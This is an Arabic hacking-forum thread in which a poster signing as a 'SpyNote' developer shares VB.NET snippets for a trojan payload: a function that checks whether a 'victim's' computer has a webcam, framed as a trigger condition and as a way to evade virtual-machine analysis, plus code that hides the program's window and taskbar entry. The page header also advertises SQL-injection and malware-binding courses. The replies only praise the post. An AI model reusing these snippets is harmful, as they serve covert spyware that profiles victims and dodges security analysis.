1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ تلغيم ] كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

الموضوع في 'حماية الأجهزة' بواسطة ✶ s c я є α м, بتاريخ ‏3 مارس 2015.

كاتب الموضوع : ✶ s c я є α м المشاهدات : 784 الردود : 14 ‏3 مارس 2015
حالة الموضوع:
مغلق
  1. غير متصل

    ✶ s c я є α м Developer SpyNote

    عضو منذ:
    ‏23 ديسمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    771
    نقاط الجائزة:
    الإقامة:

    [​IMG]




    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    السلام عليكم ....كود بسيط بدوت نت تحقق من كام الضحيه لو الضحيه يوجد بجهازه كام يشتغل الشرط او العكس لو تبغاء ضحايا ماعندها كام أنت بكيفك !$_@ انا افضل ضحايا بدون كام أنت شو تفضل ؟ ((هههههههههههه)) )4:"​



    هاذا Function
    كود:
        Declare Function capGetDriverDescriptionA Lib "avicap32.dll" (ByVal wDriver As Short, _
                                                                     ByVal lpszName As String, ByVal CbName As Integer, ByVal lpszVer As String, _
                                                                     ByVal cbVer As Integer) As Boolean
        Public Function Camera() As Boolean
            Try
                Dim d As String = Space(100)
                For i As Integer = 0 To 4
                    If capGetDriverDescriptionA(i, d, 100, Nothing, 100) Then
                        Return True
                    End If
                Next
            Catch ex As Exception
            End Try
            Return False
        End Function
    وهاذا الكود تضعه في Form1_Load
    او تضعه في Button1 الي يريحك :ُeُ!e1:​
    كود:
            If Camera() = True Then
                MsgBox("Camera=Yss")
            Else
                MsgBox("Camera=No")
            End If


    وهاذا كــود زياده على الطبخه اخفاء الفورم :cًoُnُfuُseٌd:​
    كود:
            '' اخفاء الفورم 
            Me.Hide()
            Me.ShowIcon = 1 / 0 / 1 / 0 <> 1 / 0 / 1 / 0
            Me.ShowInTaskbar = 1 / 0 / 1 / 0 <> 1 / 0 / 1 / 0




    وهاذا شررح للي مافهم شي:ُeُeX:​


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
     


    جاري تحميل الصفحة...
  2. غير متصل

    ✶ s c я є α м Developer SpyNote

    عضو منذ:
    ‏23 ديسمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    771
    نقاط الجائزة:
    الإقامة:

    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    نسيت أذكر ان بأمكانــك تخطي الانظمة الوهميه بنفس الكود لن الانظمة الوهميه بدون كام {1!$1}
     


  3. غير متصل

    rebih
    Developer

    عضو منذ:
    ‏11 مايو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    مشكووور ابدعت [​IMG]لا تحرمنا من جديد ك
     


  4. غير متصل

    ✶ s c я є α м Developer SpyNote

    عضو منذ:
    ‏23 ديسمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    771
    نقاط الجائزة:
    الإقامة:

    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    اهلا بيك اخي الغالي&:":&:":
     


  5. غير متصل

    ♥IRAQ♥ Abo Ameer
    DeveloPer Plus

    عضو منذ:
    ‏23 ديسمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    الوظيفة:
    مهندس معماري
    الإقامة:

    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    مشكور على الطرح ابدعت وجيد جدا
     


  6. غير متصل

    Janet CHaldean مشرفه أقسام التصميم والجرافيكس
    V • I • P

    عضو منذ:
    ‏5 يناير 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,238
    نقاط الجائزة:
    الجنس:
    أنثى
    الوظيفة:
    Diplomacy
    الإقامة:

    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    عاشت الايادي
     


  7. غير متصل

    ȤōŘϴ
    DeveloPer Plus

    عضو منذ:
    ‏24 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    عاشت ايدك :{14}:
     


  8. غير متصل

    Mr-TiGeR9
    rank
    Developer

    عضو منذ:
    ‏25 مارس 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    مآ شآء الله , مآ شآء الله ~

    جمييل جمييل ~


    ً#ٌ5oًًًُ.
     


  9. غير متصل

    المعاقب الصدري
    طاقم الإدارة

    عضو منذ:
    ‏20 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    681
    نقاط الجائزة:
    الجنس:
    ذكر

    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    مبدع سكريم :{1!}:
     


  10. غير متصل

    Girl - SilenT <span style="font-weight: bold; text-shadow: #BBBB
    مشرفات المنتدى

    عضو منذ:
    ‏1 ابريل 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    عاشت ايدك​
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...